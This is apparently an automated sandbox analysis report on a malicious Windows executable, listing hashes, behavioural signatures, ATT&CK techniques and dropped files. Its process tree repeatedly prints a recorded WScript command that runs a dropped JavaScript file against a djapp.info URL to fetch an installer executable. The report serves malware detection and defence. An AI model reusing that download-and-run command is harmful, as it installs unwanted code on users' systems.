53d9c49ed8b8f901b206f071b829e389435e07ee80d21327f0ed696c18fabece

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
13/05/2024, 08:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe
Size

184KB
MD5

3eaf2ecee4db8cd11b7aa8ef5cceb380
SHA1

15e85ce4945e63173fbe3c444b0e6353d2e45219
SHA256

53d9c49ed8b8f901b206f071b829e389435e07ee80d21327f0ed696c18fabece
SHA512

a1f65e886f77931797d7b51c0f297ff631d6aa43c60828c3785d8ca7053e2c8ec94a93c5efcd827f7a9cea02fea2cc1dd65c3e1b1ac3c436cd7b6537d8c2f331
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3O:/7BSH8zUB+nGESaaRvoB7FJNndn7

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1236	WScript.exe
8	1236	WScript.exe
10	1236	WScript.exe
12	2784	WScript.exe
13	2784	WScript.exe
15	2564	WScript.exe
16	2564	WScript.exe
18	1256	WScript.exe
19	1256	WScript.exe
21	1528	WScript.exe
22	1528	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 1236	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	28
PID 2080 wrote to memory of 1236	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	28
PID 2080 wrote to memory of 1236	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	28
PID 2080 wrote to memory of 1236	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	28
PID 2080 wrote to memory of 2784	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2784	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2784	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2784	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2564	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	32
PID 2080 wrote to memory of 2564	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	32
PID 2080 wrote to memory of 2564	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	32
PID 2080 wrote to memory of 2564	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	32
PID 2080 wrote to memory of 1256	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	34
PID 2080 wrote to memory of 1256	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	34
PID 2080 wrote to memory of 1256	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	34
PID 2080 wrote to memory of 1256	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	34
PID 2080 wrote to memory of 1528	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	36
PID 2080 wrote to memory of 1528	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	36
PID 2080 wrote to memory of 1528	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	36
PID 2080 wrote to memory of 1528	2080	3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3eaf2ecee4db8cd11b7aa8ef5cceb380_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js" http://www.djapp.info/?domain=UIdKXtAATM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf1BEA.exe
  2⤵
  - Blocklisted process makes network request
  PID:1236
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js" http://www.djapp.info/?domain=UIdKXtAATM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf1BEA.exe
  2⤵
  - Blocklisted process makes network request
  PID:2784
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js" http://www.djapp.info/?domain=UIdKXtAATM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf1BEA.exe
  2⤵
  - Blocklisted process makes network request
  PID:2564
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js" http://www.djapp.info/?domain=UIdKXtAATM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf1BEA.exe
  2⤵
  - Blocklisted process makes network request
  PID:1256
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js" http://www.djapp.info/?domain=UIdKXtAATM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf1BEA.exe
  2⤵
  - Blocklisted process makes network request
  PID:1528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
3e549b5389bc9c0837d865f0fd5e6f76

SHA1
bc0f0274e364e20e9a5a99fb539caba991ab1fd3

SHA256
fff9d6642902e0e72199831f2efa86def70cc12c3647dc7907a1f10f07f37e01

SHA512
ae68cf24670a2e519333d4a38fe903cd174da1c5e1a76aee5405a09ffad74394c873336dc63e87d7104e9e24fb1cc17f213eb75a830f40e0d6f69bfae08e92ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
42c1653cb06270a36b37a42cb8cc6882

SHA1
dcb6c0ef9df02e25d526c7a5fc12b7d088eadb35

SHA256
1312a5bb377042bd8be7596a1b76fd3ef8ab73d7997de186ecc961d4910c425f

SHA512
54bec1824546206990717e28a06c75ecd537f020699fa138989260526da0e34b6ffee3b86e7afa0925f22b659c9a642f15b1d9dff7c36790e50cc2f828a91255

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
88a57740ee8474378c3dc0a83d8135cc

SHA1
5a22d77e88b6dda9332bc6f855c0a445d1b538c2

SHA256
a799bbf2814e93e32807cdfc6d5db5c7b1e8aa7f2534445084f145c15573aaf8

SHA512
97899a7719a2d9dfddf841457bf466b0830c1c71cf899ef4aa3d04b60d12c5f6c3e67b0774a9f92bc7ace33b4995292fa3f758110d5813ad5fca74c30e887f98

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
e2af088e556c9482f422fe7efa53d46c

SHA1
73669a3ff5d896b719478e41a8b9b3de1cff03bb

SHA256
29bcb930f2973862a4f3701380181233d6e28be8d5f6b51f636fa99d394e8d08

SHA512
a75baed7fb429c66b72a8d32e92fc9381cd5fff9b287ecebdccacbc2b818e26387b5ef742d72deb5151eeb09fdeee1003a082bacfd640d703374a2d700d57fae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
3e267749e9510fde5cd6e74204fced96

SHA1
e455733bdace219d24932d62dca394d6f046a132

SHA256
0ade59e05dd8956bae4e2d604af09b5bc56ddbd0aefe796b1e55d9ee4cb0fe2c

SHA512
fdb3eafd2845b5a725557d9fcf9b7f01e3651fde74cb562cccb0d465214abbf9ad2d53374d18091105b953c5e332d8e2939ec409d1b9b72803a2693cea580522

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
e0c13940b1b1a5ed8bda0ec68d18bd2b

SHA1
5743d2b3353931665ed4eb6a10eee4c8bd3e40d8

SHA256
b8a0f69946cb1f3141f34dd80c967b4c6d381ad2106923ce660b63f81238ba7d

SHA512
29c2d47e39fb1a70f6bd46277dd5ab5abcf55a93e9fe33d46344e8fece33e6b88bee63230427685e1e275b094222e024811943573a260dac47e6ce87caae80a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
6745cf80264e92bc18cb18dcf9d0a42b

SHA1
d8e83ec502239b0b9766cea6bd2d90e2adcf49ee

SHA256
49104ad1709a1532e080b3fa8418ae53a3627d0e2c3b623b668b70d5bca3113a

SHA512
a7c494c6ba4b6a4cd8b870924f5e5ea733848c10e7a3d1b9c1e60e4af2ca6c450e86b873086488032e57615b91a54e7dd4b8a6fe01b6f3ce5d450b9564d8530e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
a4a14315836e144c085e5d63f0ceed45

SHA1
881fa193b88922f84e5cc1f5f76bc7bc5dab5b15

SHA256
4635ff65ea5fac246c0d7644d6ea143d0b2af0c0933eb37138b80aed8d8a363c

SHA512
703fc9afe625156952ef89b09f6caaf145dcea9fc0782600314b39fb7f6346277ef0a4f41fa7f2ffc3cd72558b3f6664333cd161a8b31556abf1e8730031e3ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4AF5.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6356.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1BEA.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AVFTAWYF.txt

Filesize
177B

MD5
c1e508539254d5d1bb8c4dac9556f790

SHA1
90463626792848c0ecd7b6bc2c4899a3e2c4a42d

SHA256
38a08e529d87a13a32b21e6c915060142eae66b4da95fac7b6f9c7a737d304e2

SHA512
2e2aef14bb0c7a045e25249d2dae295ec3ddeebc734fd2e34bceca6acb7e76452b34bc07de3fb6b39a9e85fbd7b5f3ab07708c800c176ff616f246dbe1496df9

Download Submit